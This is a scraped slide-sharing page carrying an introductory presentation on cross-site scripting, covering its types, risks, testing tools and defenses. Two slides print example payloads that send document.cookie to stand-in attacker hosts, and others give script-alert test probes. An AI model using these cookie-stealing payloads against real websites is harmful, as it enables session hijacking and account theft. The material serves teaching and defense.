Uploaded bySyedAliShahid3
PPT, PDF20 views

144205230-Cross-Site-Scripting-XSS-ppt.ppt

144205230-Cross-Site-Scripting-XSS-ppt.ppt

Embed presentation

Download to read offline
Cross Site Scripting (XSS) Cross
Cross Site Scripting: Outline Definition Risks Cross Site Scripting Types Testing Tools All Together Defense References
Definition Cross Site Scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is  The trusted website is used to store, transport, or deliver malicious content to the victim The target is to trick the client browser to execute malicious scripting commands JavaScript, VBScript, ActiveX, HTML, or Flash  Caused by insufficient input validation.
Cross Site Scripting Risks XSS can : Steal cookies • Hijack of user’s session • Unauthorized access Modify content of the web page •Inserting words or images •Misinform •Bad reputation Spy on what you do Network Mapping XSS viruses
Cross Site Scripting Types Three known types:  Reflected (Non-Persistent) • Link in other website or email  Stored (Persistent) • Forum, bulletin board, feedback form  Local •PDF Adobe Reader , FLASH player
Reflected (Non-Persistent) Send e-mail with <script> tags embedded in the link. Follows link and the script executes 1 2 http://mybank.com/ account.php?variable=”><script>document.lo cation=’http://www.badguy.com/cgi-bin/ cookie.cgi’”%20+document.cookie</script> www.badguy.com Cookie collector Malicious content dose not get stored in the server The server bounces the original input to the victim without modification
Stored (Persistent) Upload malicious scripting commands to the public forum Browse Downlaod malicious code Public forum web site Attacker Victim 1 2 3 Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script> The server stores the malicious content The server serves the malicious content in its original form
Local Send e-mail with a link - Http://freeebook.com/ haha.pdf#a=javascript:alert(‘Boo’); Request for http://freeebook.com/haha.pdf Ignore everything after # Attacker Victim 1 2 PDF Viewer gets the full URL from browser (including the content after # ) PDF Viewer executes the Javascript. 3 The injected script does not traverse to the server Arising fast as the major threat as the other two types of XSS are getting fixed
Cross Site Scripting Testing Where to start? •Search box •Feedback/Guestbook •Application forms •Look for input that can be displayed back by the site •<script>alert(“Boo”)</script> •Don’t forget to test with different encoding scheme “Base64, URL, Unicode”
Cross Site Scripting Tools N-stalker Acunetix Paros Firefox add-ons Hackbar XSS ME
Cross Site Scripting Defense Clint side •Disable JS •Verify email •Always update • Server side •Input validation (Black listing VS White listing) •Encode all meta characters send to the client •keep track of user sessions •Web application firewall •Always test

More Related Content

DOC
HallTumserFinalPaper
byDaniel Tumser
 
PPTX
Xss
byRajendra Dangwal
 
PPTX
Cross site scripting (xss)
byRitesh Gupta
 
PPTX
Cross Site Scripting Defense Presentation
byIkhade Maro Igbape
 
PPTX
Xss attack
byAmbuj Kumar
 
PPTX
Secure Code Warrior - Cross site scripting
bySecure Code Warrior
 
PPTX
Cross site scripting
bykinish kumar
 
PPTX
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
HallTumserFinalPaper
byDaniel Tumser
 
Xss
byRajendra Dangwal
 
Cross site scripting (xss)
byRitesh Gupta
 
Cross Site Scripting Defense Presentation
byIkhade Maro Igbape
 
Xss attack
byAmbuj Kumar
 
Secure Code Warrior - Cross site scripting
bySecure Code Warrior
 
Cross site scripting
bykinish kumar
 
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 

Similar to 144205230-Cross-Site-Scripting-XSS-ppt.ppt

PPTX
Identifying XSS Vulnerabilities
byn|u - The Open Security Community
 
PDF
XSS Exploitation
byHacking Articles
 
PDF
XSS Lightning talk
byJohnny Vestergaard
 
PPTX
Cross site scripting
byashutosh rai
 
PPTX
Vulnerabilities in Web Applications
byVenkat Ramana Reddy Parine
 
PPTX
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
byVikasTuwar1
 
PPTX
Cross Site Scripting
byAli Mattash
 
PPTX
Cross Site Scripting (XSS)
byBarrel Software
 
PPTX
Cm7 secure code_training_1day_xss
bydcervigni
 
PDF
Web Vulnerabilities And Exploitation - Compromising The Web
byZero Science Lab
 
PDF
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
byIRJET Journal
 
PDF
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
byEswar Publications
 
PDF
The Cross Site Scripting Guide
byDaisuke_Dan
 
PPTX
Web hack & attacks
byApurva Dhanwantri - CISA ,SCJP,C|EH, ISO/IEC 27001 LA,CPISI
 
PPTX
Client sidesec 2013 - script injection
byTal Be'ery
 
PPTX
Cross site scripting XSS
byRonan Dunne, CEH, SSCP
 
PPTX
Convincing Developers to take Cross-Site Scripting Seriously
byjpubal
 
PPT
Cross Site scripting Attacks - by Adam Nurudini
byAdam Nurudini
 
PDF
Xss 101
byn|u - The Open Security Community
 
PDF
Xss 101 by-sai-shanthan
byRaghunath G
 
Identifying XSS Vulnerabilities
byn|u - The Open Security Community
 
XSS Exploitation
byHacking Articles
 
XSS Lightning talk
byJohnny Vestergaard
 
Cross site scripting
byashutosh rai
 
Vulnerabilities in Web Applications
byVenkat Ramana Reddy Parine
 
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
byVikasTuwar1
 
Cross Site Scripting
byAli Mattash
 
Cross Site Scripting (XSS)
byBarrel Software
 
Cm7 secure code_training_1day_xss
bydcervigni
 
Web Vulnerabilities And Exploitation - Compromising The Web
byZero Science Lab
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
byIRJET Journal
 
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
byEswar Publications
 
The Cross Site Scripting Guide
byDaisuke_Dan
 
Web hack & attacks
byApurva Dhanwantri - CISA ,SCJP,C|EH, ISO/IEC 27001 LA,CPISI
 
Client sidesec 2013 - script injection
byTal Be'ery
 
Cross site scripting XSS
byRonan Dunne, CEH, SSCP
 
Convincing Developers to take Cross-Site Scripting Seriously
byjpubal
 
Cross Site scripting Attacks - by Adam Nurudini
byAdam Nurudini
 
Xss 101
byn|u - The Open Security Community
 
Xss 101 by-sai-shanthan
byRaghunath G
 

More from SyedAliShahid3

PPT
lecture3.pptlecture3 data structures pptt
bySyedAliShahid3
 
PPT
SecurityPolicy.ppt SecurityPolicy.ppt
bySyedAliShahid3
 
PPTX
webapplicationattacks-101005070110-phpapp02.pptx
bySyedAliShahid3
 
PPT
linkedLists.ppt presentation on the topic
bySyedAliShahid3
 
PPTX
Levels_of_Requirements_SRE.pptx presentation
bySyedAliShahid3
 
PPTX
BST.pptx data structures presentation ppt
bySyedAliShahid3
 
PPT
Unit24_TopologicalSort.ppt data structures
bySyedAliShahid3
 
PPT
DivideAndConquer.pptDivideAndConquer.ppt
bySyedAliShahid3
 
PPTX
AVLTrees.pptx data structures presentation
bySyedAliShahid3
 
PPT
16-avl-trees.ppt data structures prestentation
bySyedAliShahid3
 
PPT
22-graphs1-dfs-bfs.ppt data structures ppt
bySyedAliShahid3
 
PPT
25-graphs4-topological-sort.ppt data structures
bySyedAliShahid3
 
PPT
dipfinal1--150927115011-lva1-app6891.ppt
bySyedAliShahid3
 
PPT
QualityModelsAndAtttribQualityModels.ppt
bySyedAliShahid3
 
lecture3.pptlecture3 data structures pptt
bySyedAliShahid3
 
SecurityPolicy.ppt SecurityPolicy.ppt
bySyedAliShahid3
 
webapplicationattacks-101005070110-phpapp02.pptx
bySyedAliShahid3
 
linkedLists.ppt presentation on the topic
bySyedAliShahid3
 
Levels_of_Requirements_SRE.pptx presentation
bySyedAliShahid3
 
BST.pptx data structures presentation ppt
bySyedAliShahid3
 
Unit24_TopologicalSort.ppt data structures
bySyedAliShahid3
 
DivideAndConquer.pptDivideAndConquer.ppt
bySyedAliShahid3
 
AVLTrees.pptx data structures presentation
bySyedAliShahid3
 
16-avl-trees.ppt data structures prestentation
bySyedAliShahid3
 
22-graphs1-dfs-bfs.ppt data structures ppt
bySyedAliShahid3
 
25-graphs4-topological-sort.ppt data structures
bySyedAliShahid3
 
dipfinal1--150927115011-lva1-app6891.ppt
bySyedAliShahid3
 
QualityModelsAndAtttribQualityModels.ppt
bySyedAliShahid3
 

Recently uploaded

PDF
Projecte de la porta de la classe de primer A: Mar i cel.
byeduardrubio1
 
PDF
Nutrients & Role in Horticulture.pdf, Dr. Sharad Bisen Horticulture
bybisensharad
 
PDF
1ST APPLICATION FOR ANNULMENT (4)8787666.pdf
bykonstantinantountoum1
 
PPTX
Details of Muscular-and-Nervous-Tissues.pptx
byAshish Umale
 
PPTX
Searching in PubMed andCochrane_Practical Presentation.pptx
bySystematic Reviews Network (SRN)
 
PDF
Ketogenic diet in Epilepsy in children..
bymirzasania0810
 
PDF
The Pity of War: Form, Fragment, and the Artificial Echo | Understanding War ...
byNidhi Pandya
 
PDF
The Drift Principle: When Information Accelerates Faster Than Minds Can Compress
byReality Drift Archive
 
PPTX
ELEMENTS OF COMMUNICATION (UNIT 2) .pptx
byPOOJA KARVANDE
 
PDF
Types of Vegetable Gardens, College of Agriculture Balaghat.pdf
bybisensharad
 
PDF
Handwritten notes of Toxicity 1. Genotoxicity 2 Carcinogenicity 3 Teratogenic...
byjagdeepsinghynr7
 
PPTX
CROP RESIDUE MANAGEMANT AND ITS EFFECT ON SOIL HEALTH
byShraddha Maurya
 
PPTX
Limpitlaw "Licensing: From Mindset to Milestones"
byNational Information Standards Organization (NISO)
 
PDF
The Tale of Melon City poem ppt by Sahasra
bybitrasahasra
 
PDF
All Students Workshop 25 Yoga Wellness by LDMMIA
by©LDMMIA, ©Reiki Yoga
 
PPTX
ICH Harmonization A Global Pathway to Unified Drug Regulation.pptx
byDr. Smita Kumbhar
 
PPTX
Hypothesis. its definition and typrs pptx
byMakarand Joshi
 
PPTX
How to Automate Quality Checks in Odoo 18 Quality App
byCeline George
 
PDF
Models of Teaching - TNTEU - B.Ed I Semester - Teaching and Learning - BD1TL ...
byDr Raja Mohammed T
 
DOCX
Mobile applications Devlopment ReTest year 2025-2026
byDr. Mazin Mohamed alkathiri
 
Projecte de la porta de la classe de primer A: Mar i cel.
byeduardrubio1
 
Nutrients & Role in Horticulture.pdf, Dr. Sharad Bisen Horticulture
bybisensharad
 
1ST APPLICATION FOR ANNULMENT (4)8787666.pdf
bykonstantinantountoum1
 
Details of Muscular-and-Nervous-Tissues.pptx
byAshish Umale
 
Searching in PubMed andCochrane_Practical Presentation.pptx
bySystematic Reviews Network (SRN)
 
Ketogenic diet in Epilepsy in children..
bymirzasania0810
 
The Pity of War: Form, Fragment, and the Artificial Echo | Understanding War ...
byNidhi Pandya
 
The Drift Principle: When Information Accelerates Faster Than Minds Can Compress
byReality Drift Archive
 
ELEMENTS OF COMMUNICATION (UNIT 2) .pptx
byPOOJA KARVANDE
 
Types of Vegetable Gardens, College of Agriculture Balaghat.pdf
bybisensharad
 
Handwritten notes of Toxicity 1. Genotoxicity 2 Carcinogenicity 3 Teratogenic...
byjagdeepsinghynr7
 
CROP RESIDUE MANAGEMANT AND ITS EFFECT ON SOIL HEALTH
byShraddha Maurya
 
Limpitlaw "Licensing: From Mindset to Milestones"
byNational Information Standards Organization (NISO)
 
The Tale of Melon City poem ppt by Sahasra
bybitrasahasra
 
All Students Workshop 25 Yoga Wellness by LDMMIA
by©LDMMIA, ©Reiki Yoga
 
ICH Harmonization A Global Pathway to Unified Drug Regulation.pptx
byDr. Smita Kumbhar
 
Hypothesis. its definition and typrs pptx
byMakarand Joshi
 
How to Automate Quality Checks in Odoo 18 Quality App
byCeline George
 
Models of Teaching - TNTEU - B.Ed I Semester - Teaching and Learning - BD1TL ...
byDr Raja Mohammed T
 
Mobile applications Devlopment ReTest year 2025-2026
byDr. Mazin Mohamed alkathiri
 

144205230-Cross-Site-Scripting-XSS-ppt.ppt

  • 1.
  • 2.
    Cross Site Scripting:Outline Definition Risks Cross Site Scripting Types Testing Tools All Together Defense References
  • 3.
    Definition Cross Site Scripting(XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is  The trusted website is used to store, transport, or deliver malicious content to the victim The target is to trick the client browser to execute malicious scripting commands JavaScript, VBScript, ActiveX, HTML, or Flash  Caused by insufficient input validation.
  • 4.
    Cross Site ScriptingRisks XSS can : Steal cookies • Hijack of user’s session • Unauthorized access Modify content of the web page •Inserting words or images •Misinform •Bad reputation Spy on what you do Network Mapping XSS viruses
  • 5.
    Cross Site ScriptingTypes Three known types:  Reflected (Non-Persistent) • Link in other website or email  Stored (Persistent) • Forum, bulletin board, feedback form  Local •PDF Adobe Reader , FLASH player
  • 6.
    Reflected (Non-Persistent) Send e-mailwith <script> tags embedded in the link. Follows link and the script executes 1 2 http://mybank.com/ account.php?variable=”><script>document.lo cation=’http://www.badguy.com/cgi-bin/ cookie.cgi’”%20+document.cookie</script> www.badguy.com Cookie collector Malicious content dose not get stored in the server The server bounces the original input to the victim without modification
  • 7.
    Stored (Persistent) Upload maliciousscripting commands to the public forum Browse Downlaod malicious code Public forum web site Attacker Victim 1 2 3 Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script> The server stores the malicious content The server serves the malicious content in its original form
  • 8.
    Local Send e-mail witha link - Http://freeebook.com/ haha.pdf#a=javascript:alert(‘Boo’); Request for http://freeebook.com/haha.pdf Ignore everything after # Attacker Victim 1 2 PDF Viewer gets the full URL from browser (including the content after # ) PDF Viewer executes the Javascript. 3 The injected script does not traverse to the server Arising fast as the major threat as the other two types of XSS are getting fixed
  • 9.
    Cross Site ScriptingTesting Where to start? •Search box •Feedback/Guestbook •Application forms •Look for input that can be displayed back by the site •<script>alert(“Boo”)</script> •Don’t forget to test with different encoding scheme “Base64, URL, Unicode”
  • 10.
    Cross Site ScriptingTools N-stalker Acunetix Paros Firefox add-ons Hackbar XSS ME
  • 11.
    Cross Site ScriptingDefense Clint side •Disable JS •Verify email •Always update • Server side •Input validation (Black listing VS White listing) •Encode all meta characters send to the client •keep track of user sessions •Web application firewall •Always test